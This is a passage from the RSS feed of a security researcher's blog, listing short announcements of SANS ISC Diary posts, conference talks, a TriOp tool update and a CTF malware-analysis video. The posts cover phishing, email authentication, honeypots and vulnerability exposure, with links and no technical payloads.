&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
            
              <category>HTML</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2023</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - The strange case of Great honeypot of China</title>
        <link>https://untrustednetwork.net/en/2023/04/17/china-honeypots/</link>
        <pubDate>Mon, 17 Apr 2023 10:50:00 +0100</pubDate>
        
        <atom:modified>Mon, 17 Apr 2023 10:50:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2023/04/17/china-honeypots/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at a sharp increase of Shodan&amp;rsquo;s detections of honeypots in China&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/29750&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at a sharp increase of Shodan&amp;rsquo;s detections of honeypots in China&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>China</category>
            
          
            
              <category>Shodan</category>
            
          
            
              <category>Honeypot</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2023</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Use of X-Frame-Options and CSP frame-ancestors security headers on 1 million most popular domains</title>
        <link>https://untrustednetwork.net/en/2023/03/31/http-headers/</link>
        <pubDate>Fri, 31 Mar 2023 14:50:00 +0100</pubDate>
        
        <atom:modified>Fri, 31 Mar 2023 14:50:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2023/03/31/http-headers/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at the use of security-related HTTP headers that are able to prevent &amp;ldquo;framing attacks&amp;rdquo; on one million most commonly visited domains&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/29698&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at the use of security-related HTTP headers that are able to prevent &amp;ldquo;framing attacks&amp;rdquo; on one million most commonly visited domains&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
            
              <category>HTTP</category>
            
          
            
              <category>CSP</category>
            
          
            
              <category>X-Frame-Options</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2023</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - IPFS phishing and the need for correctly set HTTP security headers</title>
        <link>https://untrustednetwork.net/en/2023/03/15/ipfs-phishing/</link>
        <pubDate>Wed, 15 Mar 2023 12:20:00 +0100</pubDate>
        
        <atom:modified>Wed, 15 Mar 2023 12:20:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2023/03/15/ipfs-phishing/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at several phishing pages hosted on a disributed file system IPFS and shortly dicuss the potential of HTTP security headers to serve as a defense against phishing&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/29638&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at several phishing pages hosted on a disributed file system IPFS and shortly dicuss the potential of HTTP security headers to serve as a defense against phishing&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
            
              <category>HTTP</category>
            
          
            
              <category>HTML</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2023</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - HTML phishing attachment with browser-in-the-browser technique</title>
        <link>https://untrustednetwork.net/en/2023/02/16/bitb/</link>
        <pubDate>Thu, 16 Feb 2023 12:20:00 +0100</pubDate>
        
        <atom:modified>Thu, 16 Feb 2023 12:20:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2023/02/16/bitb/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at the use of &amp;ldquo;browser-in-the-browser&amp;rdquo; technique in a generic phishing campaign&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/29556&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at the use of &amp;ldquo;browser-in-the-browser&amp;rdquo; technique in a generic phishing campaign&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
            
              <category>Browser in the browser</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2023</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - SPF and DMARC use on 100k most popular domains</title>
        <link>https://untrustednetwork.net/en/2023/01/19/triop-tranco-spf-dmarc/</link>
        <pubDate>Thu, 19 Jan 2023 12:40:00 +0100</pubDate>
        
        <atom:modified>Thu, 19 Jan 2023 12:40:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2023/01/19/triop-tranco-spf-dmarc/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at SPF and DMARC use on world&amp;rsquo;s most popular domains&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/29452&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at SPF and DMARC use on world&amp;rsquo;s most popular domains&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>SPF</category>
            
          
            
              <category>DMARC</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2023</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Passive detection of internet-connected systems affected by vulnerabilities from the CISA KEV catalog</title>
        <link>https://untrustednetwork.net/en/2023/01/11/triop-cisa-kev/</link>
        <pubDate>Wed, 11 Jan 2023 12:00:00 +0100</pubDate>
        
        <atom:modified>Wed, 11 Jan 2023 12:00:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2023/01/11/triop-cisa-kev/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at a new function of my TriOp tool and its use for passive identification of systems affected by vulnerabilities listed in the CISA KEV Catalog&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/29426&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at a new function of my TriOp tool and its use for passive identification of systems affected by vulnerabilities listed in the CISA KEV Catalog&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Shodan</category>
            
          
            
              <category>CISA</category>
            
          
            
              <category>Vulnerability</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2023</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>TriOp update - version 1.5</title>
        <link>https://untrustednetwork.net/en/2023/01/11/triop-update-version-1.5/</link>
        <pubDate>Wed, 11 Jan 2023 11:50:00 +0100</pubDate>
        
        <atom:modified>Wed, 11 Jan 2023 11:50:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2023/01/11/triop-update-version-1.5/</guid>
        <description>I’ve published version 1.5 of TriOp today. Besides the addition of several CVEs into the internal list of vulnerabilities, a new feature was also introduced, which enables automatic generation of Shodan queries for the current list of vulnerabilities from the CISA Known Exploited Vulnerabilities (KEV) Catalog.
As alway, you may download the latest version of TriOp from my GitHub.</description>
        <content:encoded>&lt;p&gt;I’ve published version 1.5 of &lt;a href=&#34;https://untrustednetwork.net/en/triop/&#34;&gt;TriOp&lt;/a&gt; today. Besides the addition of several CVEs into the internal list of vulnerabilities, a new feature was also introduced, which enables automatic generation of Shodan queries for the current list of vulnerabilities from the &lt;a href=&#34;https://www.cisa.gov/known-exploited-vulnerabilities-catalog&#34;&gt;CISA Known Exploited Vulnerabilities (KEV) Catalog&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;As alway, you may download the latest version of TriOp from &lt;a href=&#34;https://github.com/NettleSec/TriOp&#34;&gt;my GitHub&lt;/a&gt;.&lt;/p&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        
        
        
        
          
            
              <category>Tool</category>
            
          
            
              <category>TriOp</category>
            
          
            
              <category>Shodan</category>
            
          
            
              <category>CISA</category>
            
          
            
              <category>Vulnerability</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2023</category>
            
          
        
        
      </item>
      
      <item>
        <title>SANS ISC Diary - SPF and DMARC use on GOV domains in different ccTLDs</title>
        <link>https://untrustednetwork.net/en/2022/12/30/gov-domains-spf-dmarc/</link>
        <pubDate>Fri, 30 Dec 2022 16:45:00 +0100</pubDate>
        
        <atom:modified>Fri, 30 Dec 2022 16:45:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2022/12/30/gov-domains-spf-dmarc/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at the use of SPF and DMARC on second-level governmental domains in different ccTLDs&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/29384&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at the use of SPF and DMARC on second-level governmental domains in different ccTLDs&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>SPF</category>
            
          
            
              <category>DMARC</category>
            
          
            
              <category>DKIM</category>
            
          
            
              <category>SMTP</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2022</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>Presentations from 67th TF-CSIRT meeting - Threat modeling with ATT&amp;CK and How quickly do we patch?</title>
        <link>https://untrustednetwork.net/en/2022/10/01/tf-csirt_67/</link>
        <pubDate>Sat, 01 Oct 2022 10:40:00 +0100</pubDate>
        
        <atom:modified>Sat, 01 Oct 2022 10:40:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2022/10/01/tf-csirt_67/</guid>
        <description>67th meeting of the TF-CSIRT community took place this week and I&amp;rsquo;ve had a chance to contribute to it with two presentations - one discussing the speed with which we apply patches (from a global standpoint), and another one, in which we looked at a basic approach to threat modeling using MITRE ATT&amp;amp;CK. If you would like to take a look at the slides, you may find them here - even if you didn&amp;rsquo;t have a chance to attend the event, I believe they might be useful.</description>
        <content:encoded>&lt;p&gt;67th meeting of the &lt;a href=&#34;https://tf-csirt.org/&#34;&gt;TF-CSIRT&lt;/a&gt; community took place this week and I&amp;rsquo;ve had a chance to contribute to it with two presentations - one discussing the speed with which we apply patches (from a global standpoint), and another one, in which we looked at a basic approach to threat modeling using MITRE ATT&amp;amp;CK. If you would like to take a look at the slides, you may find them &lt;a href=&#34;https://tf-csirt.org/tf-csirt/meetings/67th/&#34;&gt;here&lt;/a&gt; - even if you didn&amp;rsquo;t have a chance to attend the event, I believe they might be useful.&lt;/p&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/icons/microphone.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>Threat modeling</category>
            
          
            
              <category>Vulnerability</category>
            
          
        
        
          
            
              <category>Talks</category>
            
          
            
              <category>2022</category>
            
          
        
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Traffic Light Protocol (TLP) 2.0 is here</title>
        <link>https://untrustednetwork.net/en/2022/08/04/tlp2.0/</link>
        <pubDate>Thu, 04 Aug 2022 10:35:00 +0100</pubDate>
        
        <atom:modified>Thu, 04 Aug 2022 10:35:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2022/08/04/tlp2.0/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at a new version of the Traffic Light Protocol standard, which was published by FIRST earlier this week&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/28914&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at a new version of the Traffic Light Protocol standard, which was published by FIRST earlier this week&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>FIRST</category>
            
          
            
              <category>TLP</category>
            
          
            
              <category>CSIRT</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2022</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - EternalBlue 5 years after WannaCry and NotPetya</title>
        <link>https://untrustednetwork.net/en/2022/07/05/eternalblue/</link>
        <pubDate>Tue, 05 Jul 2022 10:35:00 +0100</pubDate>
        
        <atom:modified>Tue, 05 Jul 2022 10:35:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2022/07/05/eternalblue/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at the number of internet-exposed systems that are still vulnerable to the EternalBlue exploit&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/28816&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at the number of internet-exposed systems that are still vulnerable to the EternalBlue exploit&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Vulnerability</category>
            
          
            
              <category>EternalBlue</category>
            
          
            
              <category>WannaCry</category>
            
          
            
              <category>NotPetya</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2022</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>Malware analysis - &#39;video write-up&#39; of one of the ECSC 2021 challenges</title>
        <link>https://untrustednetwork.net/en/2022/06/21/malware_analysis-ecsc_2021/</link>
        <pubDate>Tue, 21 Jun 2022 08:25:00 +0100</pubDate>
        
        <atom:modified>Tue, 21 Jun 2022 08:25:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2022/06/21/malware_analysis-ecsc_2021/</guid>
        <description>I published a new video on the Untrusted Network YouTube channel today, which shows one possible solution for a &amp;ldquo;malware analysis task&amp;rdquo; which I prepared for the final round of last year&amp;rsquo;s European Cyber Security Challenge. If you would like to take a closer look at the multi-stage &amp;ldquo;malware&amp;rdquo; which contestants in the ECSC 2021 had to analyze, or if you would like to try to analyze the sample yourself, now you have a chance to do so - you will find further information in the following video.</description>
        <content:encoded>&lt;p&gt;I published a new video on the &lt;a href=&#34;https://www.youtube.com/channel/UCfSk9E6VKWc3omEqFbQ-Q3Q&#34;&gt;Untrusted Network&lt;/a&gt; YouTube channel today, which shows one possible solution for a &amp;ldquo;malware analysis task&amp;rdquo; which I prepared for the final round of last year&amp;rsquo;s &lt;a href=&#34;https://ecsc2021.cz/&#34;&gt;European Cyber Security Challenge&lt;/a&gt;. If you would like to take a closer look at the multi-stage &amp;ldquo;malware&amp;rdquo; which contestants in the ECSC 2021 had to analyze, or if you would like to try to analyze the sample yourself, now you have a chance to do so - you will find further information in the following video.&lt;/p&gt;
&lt;p&gt;The video is also available in a &lt;a href=&#34;https://untrustednetwork.net/cs/2022/06/21/analyza_malware-ecsc_2021/&#34;&gt;Czech language version&lt;/a&gt;.&lt;/p&gt;
&lt;p align=&#34;center&#34;&gt;&lt;iframe width=&#34;560&#34; height=&#34;315&#34; src=&#34;https://www.youtube.com/embed/eBvXLEX5hYs&#34; title=&#34;YouTube video player&#34; frameborder=&#34;0&#34; allow=&#34;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture&#34; allowfullscreen&gt;&lt;/iframe&gt;&lt;/p&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.net/images/2022/07-ecsc_2021/ecsc_2021.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>Malware</category>
            
          
            
              <category>Video</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2022</category>
            
          
        
        
      </item>
      
      <item>
        <title>SANS ISC Diary - HTML phishing attachments - now with anti-analysis features</title>
        <link>https://untrustednetwork.net/en/2022/06/01/anti-analysis-phishing/</link>
        <pubDate>Wed, 01 Jun 2022 12:05:00 +0100</pubDate>
        
        <atom:modified>Wed, 01 Jun 2022 12:05:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2022/06/01/anti-analysis-phishing/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at an unusual use of anti-debugging/anti-analysis techniques in a phishing page&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/28702&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at an unusual use of anti-debugging/anti-analysis techniques in a phishing page&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2022</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Do you want 30 BTC? Nothing is easier (or cheaper) in this phishing campaign...</title>
        <link>https://untrustednetwork.net/en/2022/05/18/btc-phishing/</link>
        <pubDate>Wed, 18 May 2022 07:50:00 +0100</pubDate>
        
        <atom:modified>Wed, 18 May 2022 07:50:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2022/05/18/btc-phishing/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at a sophisticated phishing campaign that offered 30 BTC (in someone else&amp;rsquo;s account) in an attempt to get victims to send it money&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/28662&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at a sophisticated phishing campaign that offered 30 BTC (in someone else&amp;rsquo;s account) in an attempt to get victims to send it money&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
            
              <category>Bitcoin</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2022</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - What is the simplest malware in the world?</title>
        <link>https://untrustednetwork.net/en/2022/05/06/simplest-malware/</link>
        <pubDate>Fri, 06 May 2022 09:20:00 +0100</pubDate>
        
        <atom:modified>Fri, 06 May 2022 09:20:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2022/05/06/simplest-malware/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at what might be the simplest malware in the world&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/28620&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at what might be the simplest malware in the world&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Malware</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2022</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - MITRE ATT&amp;CK v11 - a small update that can help (not just) with detection engineering</title>
        <link>https://untrustednetwork.net/en/2022/04/27/attack-v11/</link>
        <pubDate>Wed, 27 Apr 2022 11:30:00 +0100</pubDate>
        
        <atom:modified>Wed, 27 Apr 2022 11:30:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2022/04/27/attack-v11/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at a new version of the MITRE ATT&amp;amp;CK framework, which was published this week&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/28590&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at a new version of the MITRE ATT&amp;amp;CK framework, which was published this week&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>MITRE</category>
            
          
            
              <category>ATT&amp;CK</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2022</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - How is Ukrainian internet holding up during the Russian invasion?</title>
        <link>https://untrustednetwork.net/en/2022/04/13/ukrainian_internet/</link>
        <pubDate>Wed, 13 Apr 2022 11:30:00 +0100</pubDate>
        
        <atom:modified>Wed, 13 Apr 2022 11:30:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2022/04/13/ukrainian_internet/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at the impact of the current war in Ukraine on the country&amp;rsquo;s internet&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/28546&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at the impact of the current war in Ukraine on the country&amp;rsquo;s internet&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Ukraine</category>
            
          
            
              <category>Russia</category>
            
          
            
              <category>DDoS</category>
            
          
            
              <category>Shodan</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2022</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>Log4shell Lightning talk - 2022 TF-CSIRT Meeting &amp; FIRST Regional Symposium Europe</title>
        <link>https://untrustednetwork.net/en/2022/03/14/log4shell-lightning-talk/</link>
        <pubDate>Mon, 14 Mar 2022 09:00:00 +0100</pubDate>
        
        <atom:modified>Mon, 14 Mar 2022 09:00:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2022/03/14/log4shell-lightning-talk/</guid>
        <description>Few weeks ago, I attended the 2022 TF-CSIRT Meeting &amp;amp; FIRST Regional Symposium Europe and gave a lighting talk there discussing couple of interesting trends seen in Log4shell exploitation attempts and the possibility to create a simple generic defense agains similar attacks in the future. Recordings of all the talks are now available on YouTube and you may find my lightning talk in the video under this paragraph or on this link.</description>
